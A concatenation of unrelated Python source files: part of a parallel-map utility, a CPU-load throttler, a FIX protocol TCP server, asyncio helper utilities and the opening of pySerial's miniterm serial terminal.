The items ( or key(item) ) MUST be an integer, without repeats, starting
at `start`
"""
queue = dict()
for item in items:
if key is not None:
ik = key(item)
else:
ik = item
if ik == start:
yield item
start += 1
# Get any stored items
while start in queue:
yield queue.pop(start) # average O(1), worse-case O(N)
start += 1 # but based on ref below, should be O(1)
else: # for integer keys.
queue[ik] = item # Ref: https://wiki.python.org/moin/TimeComplexity
# Exhaust the rest
while start in queue:
yield queue.pop(start)
start += 1
def _txtbar(count,N,ticks=50,text='Progress'):
"""
Print a text-based progress bar.
Usage:
_txtbar(count,N)
Inputs:
count : Iteration count (start at 0)
N : Iteration size
ticks : [50] Number of ticks
text : ['Progress'] Text to display (don't include `:`)
Prints a text-based progress bar to the terminal. Obviosly
printing other things to screen will mess this up:
"""
count = int(count+1)
ticks = min(ticks,N)
isCount = int(1.0*count%round(1.0*N/ticks)) == 0
if not (isCount or count == 1 or count == N):
return
Npound = int(round(1.0 * count/N*ticks));
Nspace = int(1.0*ticks - Npound);
Nprint = int(round(1.0 * count/N*100));
if count == 1:
Nprint = 0
if len(text)>0:
text +=': '
txt = '{:s}{:s}{:s} : {:3d}% '.format(text,'#'*Npound,'-'*Nspace,Nprint)
print('\r%s' % txt,end='')
sys.stdout.flush()
technical_details = """\
This code uses iterators/generators to handle and distribute the workload.
By doing this, it is easy to have all results pass through a common
counting function for display of the progress without the use of
global (multiprocessing manager) variables and locks.
With the exception of when N == 1 (where it falls back to serial methods)
the code works as follows:
- A background thread is started that will iterate over the incoming sequence
and add items to the queue. If the incoming sequence is exhausted, the
worker sends kill signals into the queue. The items are also chunked and
enumerated (used later to sort).
- After the background thread is started a function to pull from the OUTPUT
queue is created. This counts the number of closed processes but otherwise
yields the computed result items
- A pool of workers is created. Each worker will read from the input queue
and distribute the work amongst threads (if using). It will then
return the resuts into a queue
- Now the main work happens. It is done as chain of generators/iterators.
The background worker has already begin adding items to the queue so
now we work through the output queue. Note that this is in serial
since the work was already done in parallel
- Generator to pull from the result queue
- Generator to count and display progress (if progress=True).
- Generator to hold on to and return items in a sorted manner
if sorting is requested. This can cause itermediate results to be
stored until they can be returned in order
- The output generator chain is iterated pulling items through and then
are yielded.
- cleanup and close processes (if/when the input is exhausted)
"""
np = None # will be imported when a ParEval is instantiated
class ParEval(object):
"""
Evaluate the *vectorized* fun(X) (where X is a numpy array) in chunks
using parmap. If fun(X) is not vectorized, use the regular parmap
Requires numpy
Usage:
------
Given a function `fun(X)` where X is a NumPy Array (such as N,ndim sample),
a parallel version is ParEval(fun).
To directly evaluate with X, do ParEval(fun)(X).
The advantage of returning a callable object rather than this being a
function is that there is no need to use functool.partial if you want to
pass the parallelized function to another.
Inputs:
-------
fun
Function to call. Use parmap keywords (e.g. args,kwargs,star) to
add and/or control function call.
Specify one of
n_chunks
How many chunks to split it up into
n_eval
How many evaluations per chunk (and split accordingly). Will be
the upper limit.
if neither is specified, then n_chunks is set to CPU_COUNT
Options:
-------
n_min [0]
Minimum size for a chunk. Will also override n_eval if needed
(since n_eval gets convered to n_chunks)
All additional options are passed to parmap
Splits along the first axis.
"""
def __init__(self,fun,n_chunks=None,n_eval=None,n_min=0,**kwargs):
global np
if np is None:
import numpy as np
self.fun = fun
if (n_chunks is not None) and (n_eval is not None):
raise ValueError('Must specify EITHER n_chunks OR n_eval')
if n_chunks is None and n_eval is None:
n_chunks = CPU_COUNT
self.n_chunks = n_chunks
self.n_eval = n_eval
kwargs['chunksize'] = 1
self.n_min = n_min
self.kwargs = kwargs
def __call__(self,X):
chunker = _chunker(X,n_chunks=self.n_chunks,
n_eval=self.n_eval,
n_min=self.n_min)
res = list(parmap(self.fun,chunker,**self.kwargs))
return np.concatenate(res)
class _chunker(object):
"""Object to actually break into chunks and has a __len__"""
def __init__(self,X,n_chunks=None,n_eval=None,n_min=0):
global np
if np is None:
import numpy as np
self.X = X = np.atleast_1d(X)
n = len(X)
# Get number of chunks
if n_eval is not None:
n_eval = max(n_min,n_eval)
n_chunks = int(np.ceil(n/n_eval))
if n_chunks is not None:
n_chunks = n_chunks
if n // n_chunks < n_min:
n_chunks = n // n_min
stops = np.asarray([n // n_chunks]*n_chunks,dtype=int)
stops[:n % n_chunks] += 1
self.stops = stops = np.cumsum(stops).tolist()
self.len = len(stops)
self.ii = 0
def __next__(self):
ii = self.ii
if ii == self.len:
raise StopIteration()
a = 0 if ii == 0 else self.stops[ii-1]
b = self.stops[ii]
self.ii += 1
return self.X[a:b]
next = __next__
def __iter__(self):
return self
def __len__(self):
return self.len
def set_start_method():
if sys.version_info < (3,8):
return
if mp.get_start_method(allow_none=True) != 'fork':
try:
mp.set_start_method('fork')
except RuntimeError:
raise RuntimeError('Cannot change startmethod. Restart Python and try again')
if os.environ.get('PYTOOLBOX_SET_START','false').lower() == 'true' \
and sys.version_info >= (3,8) \
and sys.platform.startswith('darwin'):
set_start_method()
import logging
logging.debug("Set start method on darwin to 'fork'")
################################################################################
################################################################################
## Below is a simpler version of parmap. It really only serves the purpose of
## being used to copy/paste when a short-and-sweet parmap is needed in a
## function or method and you do not want to require parmap(per).py
##
## It is basically *just* for reference
################################################################################
################################################################################
# def simple_parmap(fun,seq,N=None,daemon=True):
# """
# Simple, bare-bones parallel map function similar to parmap
# (or parmapper [1]) except much, much simpler. It lacks all
# bells and whistles but *does* perform parallel mapping
#
# Note: This always returns a list and not an iterator!
# And will not return until all computation is complete
#
# Use parmap if it is availible.
#
# Inspired by [2]
#
# [1]:https://github.com/Jwink3101/parmapper
# [2]:https://stackoverflow.com/a/16071616/3633154
# """
# import multiprocessing as mp
# import sys
# if sys.platform.startswith('darwin') and \
# sys.version_info >= (3,8) and \
# mp.get_start_method(allow_none=True) != 'fork':
# raise RuntimeError("Must set multiprocessing start_method to 'fork'")
# if N is None:
# N = mp.cpu_count()
# def _fun(fun, q_in, q_out):
# while True:
# i, x = q_in.get()
# if i is None:
# q_in.task_done()
# break
# q_out.put((i, fun(x)))
# q_in.task_done()
#
# q_in,q_out = mp.JoinableQueue(),mp.Queue()
#
# proc = [mp.Process(target=_fun, args=(fun, q_in, q_out)) for _ in range(N)]
# for p in proc:
# p.daemon=daemon
# p.start()
#
# count = 0
# for ii,x in enumerate(seq):
# q_in.put((ii,x))
# count += 1
#
# for _ in range(N): q_in.put((None,None))
# res = [q_out.get() for _ in range(count)]
#
# q_in.join()
# for p in proc: p.join()
#
# return [x for i, x in sorted(res)]
|
cpu.py | import psutil # type: ignore
import multiprocessing
import threading
import time
from grape import FitnessHelper
class Cpu:
"""
Description:
------------
CPU負荷対応ツール
"""
__percent: float
__rate: float
__interval: float
__prev_percent: float
__prev_sleep: float
def __init__(self, percent: float, rate: float = 0.7, interval: float = 5) -> None:
self.__percent = min(90.0, max(5.0, percent))
self.__rate = rate
self.__interval = max(1.0, interval)
self.__prev_percent = percent
self.__prev_sleep = 0.1
self.__start()
def __start(self) -> None:
t = threading.Thread(target=self.__run, daemon=True)
t.start()
def __run(self) -> None:
while True:
percent: float = psutil.cpu_percent(interval=None) # type: ignore
percent = percent * self.__rate + self.__prev_percent * (1 - self.__rate)
FitnessHelper.sleep = max(0.001, min(2.0, FitnessHelper.sleep * percent / self.__percent * self.__rate + self.__prev_sleep * (1 - self.__rate)))
if FitnessHelper.sleep > 1:
prev = FitnessHelper.pool_size
FitnessHelper.pool_size = max(1, FitnessHelper.pool_size - 1)
if FitnessHelper.pool_size < prev:
FitnessHelper.sleep /= 2
elif FitnessHelper.sleep < 0.1:
prev = FitnessHelper.pool_size
FitnessHelper.pool_size = min(multiprocessing.cpu_count(), FitnessHelper.pool_size + 1)
if FitnessHelper.pool_size > prev:
FitnessHelper.sleep *= 2
self.__prev_percent = percent
self.__prev_sleep = FitnessHelper.sleep
time.sleep(self.__interval)
|
server.py | """Fix TCP server module."""
import errno
import socket
import select
import threading
from six.moves import queue
from testplan.common.utils.timing import (
TimeoutException,
TimeoutExceptionInfo,
wait,
)
from testplan.common.utils.sockets.fix.utils import utc_timestamp
class ConnectionDetails(object):
"""
Contains all information required for each connection to the server
"""
def __init__(
self, connection, name=None, queue=None, in_seqno=1, out_seqno=1
):
"""
Create a new ConnectionDetails. Only the connection is required
initially, as the rest of the details are set later.
:param connection: The connection
:type connection: ``socket._socketobject``
:param name: Name of connection (tuple of sender and target)
:type name: ``tuple`` of ``str`` and ``str``
:param queue: Queue of receiving messages
:type queue: ``queue``
:param in_seqno: Input messages sequence number
:type in_seqno: ``int``
:param out_seqno: Output messages sequence number
:type out_seqno: ``int``
"""
self.connection = connection
self.name = name
self.queue = queue
self.in_seqno = in_seqno
self.out_seqno = out_seqno
def _has_logon_tag(msg):
"""
Check if it is a logon message.
:param msg: Fix message
:type msg: ``FixMessage``
:return: ``True`` if it is a logon message
:rtype: ``bool``
"""
return msg.tag_exact(35, "A")
def _is_session_control_msg(msg):
"""
Check if message is logout or heartbeat.
:param msg: Fix message.
:type msg: ``FixMessage``
:return: ``True`` if it is a message with non-business code
:rtype: ``bool``
"""
return _has_logout_tag(msg) or _has_heartbeat_tag(msg)
def _has_logout_tag(msg):
"""
Check if logout message.
:param msg: Fix message.
:type msg: ``FixMessage``
:return: True if it is a logout message
:rtype: ``bool``
"""
return msg.tag_exact(35, "5")
def _has_heartbeat_tag(msg):
"""
Check if heartbeat message.
:param msg: Fix message.
:type msg: ``FixMessage``
:return: True if it is a heartbeat message
:rtype: ``bool``
"""
return msg.tag_exact(35, "0")
class Server(object):
"""
A server that can send and receive FIX messages over the session protocol.
Supports multiple connections.
The server stamps every outgoing message with the senderCompID and
targetCompID for the corresponding connection.
"""
def __init__(
self,
msgclass,
codec,
host="localhost",
port=0,
version="FIX.4.2",
logger=None,
):
"""
Create a new FIX server.
This constructor takes parameters that specify the address (host, port)
to connect to. The server stamps every outgoing message with the
senderCompID and targetCompID for the corresponding connection.
:param msgclass: Type used to send and receive FIX messages.
:type msgclass: ``type``
:param codec: A Codec to use to encode and decode FIX messages.
:type codec: a ``Codec`` instance
:param host: hostname or IP address to bind to.
:type host: ``str``
:param port: port number
:type port: ``str`` or ``int``
:param version: FIX version, defaults to "FIX.4.2". This string is used
as the contents of tag 8 (BeginString).
:type version: ``str``
:param logger: Logger instance to be used.
:type logger: ``logging.Logger``
"""
self._input_host = host
self._input_port = port
self._ip = None
self._port = None
self.version = version
self.msgclass = msgclass
self.codec = codec
self.log_callback = logger.debug if logger else lambda msg: None
self._listening = False
self._conndetails_by_fd = {}
self._conndetails_by_name = {}
self._first_sender = None
self._first_target = None
self._socket = None
self._recv_thread = None
self._lock = threading.Lock()
self._pobj = select.poll()
@property
def host(self):
"""Input host provided."""
return self._input_host
@property
def ip(self):
"""IP retrieved from socket."""
return self._ip
@property
def port(self):
"""Port retrieved after binding."""
return self._port
def start(self, timeout=30):
"""
Start the FIX server.
"""
self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self._socket.bind((self._input_host, self._input_port))
self._ip, self._port = self._socket.getsockname()
self.log_callback(
"Started server on {}:{}".format(self.host, self.port)
)
self._recv_thread = threading.Thread(target=self._listen)
self._recv_thread.daemon = True
self._recv_thread.start()
timeout_info = TimeoutExceptionInfo()
wait(lambda: self._listening, timeout=timeout, interval=0.1)
if not self._listening:
raise TimeoutException(
"Could not start server: timed out on listening. {}".format(
timeout_info.msg()
)
)
self.log_callback("Listening for socket events.")
def _listen(self):
"""
Listen for new inbound connections and messages from existing
connections.
"""
self._socket.listen(1)
self._listening = True
self._pobj.register(
self._socket.fileno(),
select.POLLIN | select.POLLNVAL | select.POLLHUP,
)
closed = False
while (not closed) and self._listening:
events = self._pobj.poll(1.0)
for fdesc, event in events:
if fdesc == self._socket.fileno():
# Socket event received
if event in [select.POLLNVAL, select.POLLHUP]:
self.log_callback('"Close socket" event received.')
closed = True
break # out of 'for'
elif event == select.POLLIN:
self.log_callback('"New connection" event received.')
self._add_connection()
else:
raise Exception(
"Unexpected event {0} on fdesc {1}.".format(
event, fdesc
)
)
else:
# Connection event received
self._process_connection_event(fdesc, event)
self._remove_all_connections()
self._socket.shutdown(socket.SHUT_RDWR)
self._socket.close()
def _add_connection(self):
"""
Accept new inbound connection from socket.
"""
connection, _ = self._socket.accept()
conn_details = ConnectionDetails(connection)
self._conndetails_by_fd[connection.fileno()] = conn_details
self._pobj.register(
connection.fileno(),
select.POLLIN | select.POLLNVAL | select.POLLHUP,
)
def _remove_connection(self, fdesc):
"""
Unregister, close and remove inbound connection with given fd.
:param fdesc: File descriptor of connection to be removed.
:type fdesc: ``int``
"""
self._pobj.unregister(fdesc)
try:
self._conndetails_by_fd[fdesc].connection.shutdown(
socket.SHUT_RDWR
)
except socket.error as serr:
if serr.errno != errno.ENOTCONN:
raise
# Else, client already closed the connection.
self._conndetails_by_fd[fdesc].connection.close()
name = self._conndetails_by_fd[fdesc].name
del self._conndetails_by_fd[fdesc]
if name in self._conndetails_by_name:
del self._conndetails_by_name[name]
def _remove_all_connections(self):
"""
Unregister, close and remove all existing inbound connections.
"""
for fdesc in self._conndetails_by_fd:
self._pobj.unregister(fdesc)
self._conndetails_by_fd[fdesc].connection.shutdown(
socket.SHUT_RDWR
)
self._conndetails_by_fd[fdesc].connection.close()
del self._conndetails_by_name[self._conndetails_by_fd[fdesc].name]
self._conndetails_by_fd = {}
def _process_connection_event(self, fdesc, event):
"""
Process an event received from a connection.
:param fdesc: File descriptor of the connection the message was
received from.
:type fdesc: ``int``
:param event: Event received from connection.
:type event: ``.int``
"""
connection = self._conndetails_by_fd[fdesc].connection
if event == select.POLLIN:
with self._lock:
data = connection.recv(4096)
if not data:
self.log_callback(
"Closing connection {} since no data available".format(
self._conndetails_by_fd[fdesc].name
)
)
self._remove_connection(fdesc)
else:
msg = self.msgclass.from_buffer(data, self.codec)
self._process_message(fdesc, msg)
elif event in [select.POLLNVAL, select.POLLHUP]:
self.log_callback(
"Closing connection {} event received".format(connection.name)
)
self._remove_connection(fdesc)
else:
raise Exception(
"unexpected event {0} on fdesc {1}".format(event, fdesc)
)
def _process_message(self, fdesc, msg):
"""
Process given message received from connection with given fd.
:param fdesc: File descriptor of connection message was received from.
:type fdesc: ``int``
:param msg: Fix message received.
:type msg: ``FixMessage``
"""
conn_name = (msg[56], msg[49])
if _has_logout_tag(msg):
self._no_lock_send(msg, conn_name, fdesc)
self._remove_connection(fdesc)
elif self._conn_loggedon(conn_name):
if _is_session_control_msg(msg):
self.log_callback(
"Session control msg from {}".format(conn_name)
)
self._no_lock_send(msg, conn_name)
else:
self.log_callback(
"Incoming data msg from {}".format(conn_name)
)
self._conndetails_by_name[conn_name].in_seqno += 1
self._conndetails_by_name[conn_name].queue.put(msg, True, 1)
elif _has_logon_tag(msg):
self._logon_connection(fdesc, conn_name)
self._no_lock_send(msg, conn_name)
else:
raise Exception(
"Connection {} sent msg before logon".format(conn_name)
)
def _conn_loggedon(self, conn_name):
"""
Check if given connection is logged on.
:param conn_name: Connection name.
:type conn_name: ``tuple`` of ``str`` and ``str``
:return: ``True`` if it is a connection has already logged on
:rtype: ``bool``
"""
return conn_name in self._conndetails_by_name
def _logon_connection(self, fdesc, conn_name):
"""
Logon given connection for given file descriptor.
:param fdesc: File descriptor of connection.
:type fdesc: ``int``
:param conn_name: Connection name.
:type conn_name: ``tuple`` of ``str`` and ``str``
"""
conndetails = self._conndetails_by_fd[fdesc]
conndetails.name = conn_name
conndetails.queue = queue.Queue()
conndetails.in_seqno = 1
conndetails.out_seqno = 1
self._conndetails_by_name[conn_name] = conndetails
if self._first_sender is None:
(self._first_sender, self._first_target) = conn_name
self.log_callback("Logged on connection {}.".format(conn_name))
def active_connections(self):
"""
Returns a list of currently active connections
:return: List of active connection names (each a tuple of sender and
target)
:rtype: ``list`` of ``tuple`` of ``str`` and ``str``
"""
return [
detail.name
for detail in self._conndetails_by_fd.values()
if detail.name is not None
]
def is_connection_active(self, conn_name):
"""
Checks whether the given connection is currently active.
:param conn_name: Connection name to be checked if active
:type conn_name: ``tuple`` of ``str`` and ``str``
:return: ``True`` if the given connection is active. ``False`` otherwise
:rtype: ``bool``
"""
return conn_name in self._conndetails_by_name
def stop(self):
"""
Close the connection.
"""
self._listening = False
if self._recv_thread:
self._recv_thread.join()
self.log_callback("Stopped server.")
def _validate_connection_name(self, conn_name):
"""
Check if given connection name is valid.
If this is ``(None, None)``, then the connection defaults to the one
and only existing active connection. If there are more active
connections or the initial connection is no longer valid this will fail.
The tuple of ``(sender, target)`` represents the connection name.
:param sender: Sender id.
:type sender: ``str``
:param target: Target id.
:type target: ``str``
:return: Connection name to send message to.
:rtype: ``tuple`` of ``str`` and ``str``
"""
sender, target = conn_name
if (sender, target) == (None, None):
if len(self._conndetails_by_name) != 1:
raise Exception(
"Cannot use default connection "
"since more connections active"
)
(sender, target) = (self._first_sender, self._first_target)
if not self.is_connection_active((sender, target)):
raise Exception(
"Connection {} not active".format((sender, target))
)
return sender, target
def _add_msg_tags(self, msg, conn_name, fdesc=None):
"""
Add session tags and senderCompID and targetCompID tags to the given
FIX message.
:param msg: Message to be sent.
:type msg: ``FixMessage``
:param sender: Sender id.
:type sender: ``str``
:param target: Target id.
:type target: ``str``
:return: The FIX msg with the tags set.
:rtype: ``FixMessage``
"""
sender, target = conn_name
msg[8] = self.version
if fdesc:
conndetails = self._conndetails_by_fd[fdesc]
else:
conndetails = self._conndetails_by_name[(sender, target)]
msg[34] = conndetails.out_seqno
conndetails.out_seqno += 1
msg[49] = sender
msg[56] = target
msg[52] = getattr(self.codec, "utc_timestamp", utc_timestamp)()
return msg
def _no_lock_send(self, msg, conn_name, fdesc=None):
"""
Send the given Fix message through the given connection, expecting
the lock is already acquired.
The message will be enriched with session tags and sequence numbers.
:param msg: message to be sent
:type msg: ``FixMessage``
:param sender: Sender id.
:type sender: ``str``
:param target: Target id.
:type target: ``str``
"""
sender, target = conn_name
msg = self._add_msg_tags(msg, (sender, target), fdesc)
self.log_callback(
"Sending on connection {} message {}".format((sender, target), msg)
)
if fdesc:
self._conndetails_by_fd[fdesc].connection.send(
msg.to_wire(self.codec)
)
else:
self._conndetails_by_name[(sender, target)].connection.send(
msg.to_wire(self.codec)
)
def send(self, msg, conn_name=(None, None)):
"""
Send the given Fix message through the given connection.
The message will be enriched with session tags and sequence numbers.
The connection name - (sender, target) - defaults to (None, None).
In this case, the server will try to find the one and only available
connection. This will fail if there are more connections available or
if the initial connection is no longer active.
:param msg: Message to be sent.
:type msg: ``FixMessage``
:param conn_name: Connection name to send message to. This is the tuple
(sender id, target id)
:type conn_name: ``tuple`` of ``str`` and ``str``
:return: Fix message sent
:rtype: ``FixMessage``
"""
conn_name = self._validate_connection_name(conn_name)
with self._lock:
conn_name = self._validate_connection_name(conn_name)
msg = self._add_msg_tags(msg, conn_name)
self.log_callback(
"Sending on connection {} message {}".format(conn_name, msg)
)
conn_name = self._validate_connection_name(conn_name)
self._conndetails_by_name[conn_name].connection.send(
msg.to_wire(self.codec)
)
return msg
def receive(self, conn_name=(None, None), timeout=30):
"""
Receive a FIX message from the given connection.
The connection name defaults to ``(None, None)``. In this case,
the server will try to find the one and only available connection.
This will fail if there are more connections available or if the initial
connection is no longer active.
:param conn_name: Connection name to receive message from
:type conn_name: ``tuple`` of ``str`` and ``str``
:param timeout: timeout in seconds
:type timeout: ``int``
:return: Fix message received
:rtype: ``FixMessage``
"""
conn_name = self._validate_connection_name(conn_name)
return self._conndetails_by_name[conn_name].queue.get(True, timeout)
def flush(self):
"""
Flush the receive queues.
"""
for conn in self._conndetails_by_name:
self._flush_queue(self._conndetails_by_name[conn].queue)
if self.log_callback:
self.log_callback("Flushed received message queues")
def _flush_queue(self, queue):
"""
Flush the given receive queue.
:param queue: Queue to flush.
:type queue: ``queue``
"""
try:
while True:
queue.get(False)
except queue.Empty:
return
|
async_utils.py | # -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------
#
# Copyright 2018-2019 Fetch.AI Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ------------------------------------------------------------------------------
"""This module contains the misc utils for async code."""
import asyncio
import datetime
import logging
import subprocess # nosec
import time
from asyncio import CancelledError
from asyncio.events import AbstractEventLoop, TimerHandle
from asyncio.futures import Future
from asyncio.tasks import Task
from collections.abc import Iterable
from threading import Thread
from typing import (
Any,
Awaitable,
Callable,
Container,
List,
Optional,
Sequence,
Set,
Tuple,
Union,
)
try:
from asyncio import create_task # pylint: disable=ungrouped-imports,unused-import
except ImportError: # pragma: no cover
# for python3.6!
from asyncio import ensure_future as create_task # type: ignore # noqa: F401 # pylint: disable=ungrouped-imports,unused-import
logger = logging.getLogger(__file__)
def ensure_list(value: Any) -> List:
"""Return [value] or list(value) if value is a sequence."""
if isinstance(value, list):
return value
if isinstance(value, Iterable):
return list(value)
return [value]
class AsyncState:
"""Awaitable state."""
def __init__(
self, initial_state: Any = None, states_enum: Optional[Container[Any]] = None
):
"""Init async state.
:param initial_state: state to set on start.
:param states_enum: container of valid states if not provided state not checked on set.
"""
self._state = initial_state
self._watchers: Set[Future] = set()
self._callbacks: List[Callable[[Any], None]] = []
self._states_enum = states_enum
def set(self, state: Any) -> None:
"""Set state."""
if self._states_enum is not None and state not in self._states_enum:
raise ValueError(
f"Unsupported state: {state}. Valid states are {self._states_enum}"
)
if self._state == state: # pragma: no cover
return
self._state_changed(state)
self._state = state
def add_callback(self, callback_fn: Callable[[Any], None]) -> None:
"""
Add callback to track state changes.
:param callback_fn: callable object to be called on state changed.
:return: None
"""
self._callbacks.append(callback_fn)
def get(self) -> Any:
"""Get state."""
return self._state
def _state_changed(self, state: Any) -> None:
"""Fulfill watchers for state."""
for callback_fn in self._callbacks:
try:
callback_fn(state)
except Exception: # pylint: disable=broad-except
logger.exception(f"Exception on calling {callback_fn}")
for watcher in list(self._watchers):
if state not in watcher._states: # type: ignore # pylint: disable=protected-access # pragma: nocover
continue
if not watcher.done():
watcher._loop.call_soon_threadsafe( # pylint: disable=protected-access
self._watcher_result_callback(watcher), (self._state, state)
)
self._remove_watcher(watcher)
def _remove_watcher(self, watcher: Future) -> None:
"""Remove watcher for state wait."""
try:
self._watchers.remove(watcher)
except KeyError:
pass
@staticmethod
def _watcher_result_callback(watcher: Future) -> Callable:
"""Create callback for watcher result."""
# docstyle.
def _callback(result):
if watcher.done(): # pragma: nocover
return
watcher.set_result(result)
return _callback
async def wait(self, state_or_states: Union[Any, Sequence[Any]]) -> Tuple[Any, Any]:
"""Wait state to be set.
:params state_or_states: state or list of states.
:return: tuple of previous state and new state.
"""
states = ensure_list(state_or_states)
if self._state in states:
return (None, self._state)
watcher: Future = Future()
watcher._states = states # type: ignore # pylint: disable=protected-access
self._watchers.add(watcher)
try:
return await watcher
finally:
self._remove_watcher(watcher)
class PeriodicCaller:
"""
Schedule a periodic call of callable using event loop.
Used for periodic function run using asyncio.
"""
def __init__(
self,
callback: Callable,
period: float,
start_at: Optional[datetime.datetime] = None,
exception_callback: Optional[Callable[[Callable, Exception], None]] = None,
loop: Optional[AbstractEventLoop] = None,
):
"""
Init periodic caller.
:param callback: function to call periodically
:param period: period in seconds.
:param start_at: optional first call datetime
:param exception_callback: optional handler to call on exception raised.
:param loop: optional asyncio event loop
"""
self._loop = loop or asyncio.get_event_loop()
self._periodic_callable = callback
self._start_at = start_at or datetime.datetime.now()
self._period = period
self._timerhandle: Optional[TimerHandle] = None
self._exception_callback = exception_callback
def _callback(self) -> None:
"""Call on each scheduled call."""
self._schedule_call()
try:
self._periodic_callable()
except Exception as exception: # pylint: disable=broad-except
if not self._exception_callback: # pragma: nocover
raise
self._exception_callback(self._periodic_callable, exception)
def _schedule_call(self) -> None:
"""Set schedule for call."""
if self._timerhandle is None:
ts = time.mktime(self._start_at.timetuple())
delay = max(0, ts - time.time())
self._timerhandle = self._loop.call_later(delay, self._callback)
else:
self._timerhandle = self._loop.call_later(self._period, self._callback)
def start(self) -> None:
"""Activate period calls."""
if self._timerhandle: # pragma: nocover
return
self._schedule_call()
def stop(self) -> None:
"""Remove from schedule."""
if not self._timerhandle: # pragma: nocover
return
self._timerhandle.cancel()
self._timerhandle = None
def ensure_loop(loop: AbstractEventLoop = None) -> AbstractEventLoop:
"""
Use loop provided or create new if not provided or closed.
Return loop passed if its provided,not closed and not running, otherwise returns new event loop.
:param loop: optional event loop
:return: asyncio event loop
"""
try:
loop = loop or asyncio.new_event_loop()
assert not loop.is_closed()
assert not loop.is_running()
except (RuntimeError, AssertionError):
loop = asyncio.new_event_loop()
return loop
class AnotherThreadTask:
"""
Schedule a task to run on the loop in another thread.
Provides better cancel behaviour: on cancel it will wait till cancelled completely.
"""
def __init__(self, coro: Awaitable, loop: AbstractEventLoop) -> None:
"""
Init the task.
:param coro: coroutine to schedule
:param loop: an event loop to schedule on.
"""
self._loop = loop
self._coro = coro
self._task: Optional[asyncio.Task] = None
self._future = asyncio.run_coroutine_threadsafe(self._get_task_result(), loop)
async def _get_task_result(self) -> Any:
"""
Get task result, should be run in target loop.
:return: task result value or raise an exception if task failed
"""
self._task = self._loop.create_task(self._coro)
return await self._task
def result(self, timeout: Optional[float] = None) -> Any:
"""
Wait for coroutine execution result.
:param timeout: optional timeout to wait in seconds.
"""
return self._future.result(timeout)
def cancel(self) -> None:
"""Cancel coroutine task execution in a target loop."""
if self._task is None:
self._loop.call_soon_threadsafe(self._future.cancel)
else:
self._loop.call_soon_threadsafe(self._task.cancel)
def done(self) -> bool:
"""Check task is done."""
return self._future.done()
class ThreadedAsyncRunner(Thread):
"""Util to run thread with event loop and execute coroutines inside."""
def __init__(self, loop=None) -> None:
"""
Init threaded runner.
:param loop: optional event loop. is it's running loop, threaded runner will use it.
"""
self._loop = loop or asyncio.new_event_loop()
assert not self._loop.is_closed()
super().__init__(daemon=True)
def start(self) -> None:
"""Start event loop in dedicated thread."""
if self.is_alive() or self._loop.is_running(): # pragma: nocover
return
super().start()
self.call(asyncio.sleep(0.001)).result(1)
def run(self) -> None:
"""Run code inside thread."""
logger.debug("Starting threaded asyncio loop...")
asyncio.set_event_loop(self._loop)
self._loop.run_forever()
logger.debug("Asyncio loop has been stopped.")
def call(self, coro: Awaitable) -> Any:
"""
Run a coroutine inside the event loop.
:param coro: a coroutine to run.
"""
return AnotherThreadTask(coro, self._loop)
def stop(self) -> None:
"""Stop event loop in thread."""
logger.debug("Stopping...")
if not self.is_alive(): # pragma: nocover
return
if self._loop.is_running():
logger.debug("Stopping loop...")
self._loop.call_soon_threadsafe(self._loop.stop)
logger.debug("Wait thread to join...")
self.join(10)
logger.debug("Stopped.")
async def cancel_and_wait(task: Optional[Task]) -> Any:
"""Wait cancelled task and skip CancelledError."""
if not task: # pragma: nocover
return
try:
if task.done():
return await task
task.cancel()
return await task
except CancelledError as e:
return e
class AwaitableProc:
"""
Async-friendly subprocess.Popen
"""
def __init__(self, *args, **kwargs):
self.args = args
self.kwargs = kwargs
self.proc = None
self._thread = None
self.loop = None
self.future = None
async def start(self):
"""Start the subprocess"""
self.proc = subprocess.Popen(*self.args, **self.kwargs) # nosec
self.loop = asyncio.get_event_loop()
self.future = asyncio.futures.Future()
self._thread = Thread(target=self._in_thread)
self._thread.start()
try:
return await asyncio.shield(self.future)
except asyncio.CancelledError: # pragma: nocover
self.proc.terminate()
return await self.future
finally:
self._thread.join()
def _in_thread(self):
self.proc.wait()
self.loop.call_soon_threadsafe(self.future.set_result, self.proc.returncode)
|
miniterm.py | #!/usr/bin/env python
#
# Very simple serial terminal
#
# This file is part of pySerial. https://github.com/pyserial/pyserial
# (C)2002-2015 Chris Liechti <cliechti@gmx.net>
#
# SPDX-License-Identifier: BSD-3-Clause
import codecs
import os
import sys
import threading
import serial
from serial.tools.list_ports import comports
from serial.tools import hexlify_codec
# pylint: disable=wrong-import-order,wrong-import-position
codecs.register(lambda c: hexlify_codec.getregentry() if c == 'hexlify' else None)
try:
raw_input
except NameError:
# pylint: disable=redefined-builtin,invalid-name
raw_input = input # in python3 it's "raw"
unichr = chr
def key_description(character):
"""generate a readable description for a key"""
ascii_code = ord(character)
if ascii_code < 32:
return 'Ctrl+{:c}'.format(ord('@') + ascii_code)
else:
return repr(character)
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
class ConsoleBase(object):
"""OS abstraction for console (input/output codec, no echo)"""
def __init__(self):
if sys.version_info >= (3, 0):
self.byte_output = sys.stdout.buffer
else:
self.byte_output = sys.stdout
self.output = sys.stdout
def setup(self):
"""Set console to read single characters, no echo"""
def cleanup(self):
"""Restore default console settings"""
def getkey(self):
"""Read a single key from the console"""
return None
def write_bytes(self, byte_string):
"""Write bytes (already encoded)"""
self.byte_output.write(byte_string)
self.byte_output.flush()
def write(self, text):
"""Write string"""
self.output.write(text)
self.output.flush()
def cancel(self):
"""Cancel getkey operation"""
# - - - - - - - - - - - - - - - - - - - - - - - -
# context manager:
# switch terminal temporary to normal mode (e.g. to get user input)
def __enter__(self):
self.cleanup()
return self
def __exit__(self, *args, **kwargs):
self.setup()
if os.name == 'nt': # noqa
import msvcrt
import ctypes
class Out(object):
"""file-like wrapper that uses os.write"""
def __init__(self, fd):
self.fd = fd
def flush(self):
pass
def write(self, s):
os.write(self.fd, s)
class Console(ConsoleBase):
def __init__(self):
super(Console, self).__init__()
self._saved_ocp = ctypes.windll.kernel32.GetConsoleOutputCP()
